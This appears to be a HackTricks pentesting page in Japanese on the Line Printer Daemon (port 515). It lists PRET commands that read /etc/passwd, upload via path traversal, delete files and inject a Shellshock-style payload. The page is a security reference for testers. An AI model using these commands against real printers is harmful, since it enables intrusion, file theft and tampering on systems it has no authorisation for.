hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

4.4 KiB
Raw Blame History

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!

HackTricksをサポートする他の方法:

Line Printer Daemon (LPD) プロトコルは元々80年代のBerkeley Unixで導入されました後にRFC1179によって規定されました
デーモンは515/tcpポートで実行され、lprコマンドを使用してアクセスできます。印刷するには、クライアントはジョブ/ユーザー名を定義するコントロールファイルと、印刷される実際のデータを含むデータファイルを送信します。データファイルの入力タイプは、様々なファイル形式の中からコントロールファイルで設定できます。しかし、印刷データの実際の処理方法はLPDの実装次第です。Unix系オペレーティングシステムのための人気なLPD実装にはLPRngがあります。LPDは、悪意のあるPostScriptPJLプリントジョブを展開するためのキャリアとして使用されることがあります。

lpdprintlpdtestツールはPRETに含まれています。これらはLPD対応プリンターに直接データを印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です:

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

プリンターのハッキングについてもっと学びたい場合は、このページを読んでください

Shodan

  • port 515
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェックしてください!

HackTricksをサポートする他の方法: